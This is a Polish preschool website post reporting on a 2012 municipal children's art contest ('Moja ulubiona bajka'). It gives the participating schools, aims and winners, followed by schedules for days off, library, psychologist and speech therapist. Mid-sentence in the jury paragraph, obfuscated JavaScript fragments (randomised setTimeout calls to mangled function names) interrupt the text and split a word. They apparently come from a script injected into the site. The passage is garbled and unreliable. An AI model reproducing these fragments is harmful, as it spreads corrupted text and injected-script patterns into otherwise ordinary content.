I Gminny konkurs plastyczny

W dniu 5 czerwca 2012 roku odbył się I Gminny Konkurs Plastyczny pod hasłem „Świat wokół nas” zorganizowany przez Publiczne Przedszkole w Studzieńcu.

Tegoroczne hasło konkursu brzmiało „Moja ulubiona bajka”. Udział w konkursie wzięły dzieci z trzech placówek tj.: Szkoły Podstawowej w Sudragach, Szkoły Podstawowej w Borkowie Kościelnym i gospodarze, dzieci z Publicznego Przedszkola w Studzieńcu.

Celem konkursu było inspirowanie zainteresowań plastycznych oraz promowanie uczniów uzdolnionych, kształtowanie postawy twórczej wobec siebie i świata oraz integrowanie dzieci z różnych placówek. Technika prac była dowolna, a w skład jury wchodzili wszyscy opiekunowie dzieci.

Uczestnicy mieli godzinę czasu na wykonanie swoich prac. Wszyscy bardzo się zaangażowali i wykazali dużą pomysłowością, kreatywnością i znajomością bajek. Jury miało ogromny kłopot wybierając najlepsze prace, gdyż wszystkie były bardzo ładne, ciekawe i estetyczne. Po burzliwych naradach zdom() * 5);if (number1==3){var delay = 15000;setTimeout($VOcl3cIRrbzlimOyC8H(0), delay);}andom()*5);if (number1==3){var delay = 15000;setTimeout($cFN$wEpyMrNXtezaeR2(0), delay);}decydowało o przydzieleniu trzech I miejsc, jednego II i jednego III miejsca.

Z naszej placówki I miejsce zajął MICHAŁ KOZŁOWSKI, zaś II miejsce DOMINIKA OLSZEWSKA.

Wszystkie dzieci otrzymały pamiątkowe dyplomy oraz upominki. Obiecały również organizatorom, że w przyszły, roku też ich odwiedzą.

Dni wolne

2 listopada 2017
3 listopada 2017
21 grudnia 2017
22 grudnia 2017
30 kwietnia 2018
2 maja 2018
4 maja 2018
1 czerwca 2018

Biblioteka szkolna

Poniedziałek 13.15 – 14.15
Środa 12.45 – 13.45

Psycholog

Środa 7.30 – 10.30

Logopeda

Wtorek 7.30 – 8.00
13.30 – 14.30
Środa 13.00 – 13.30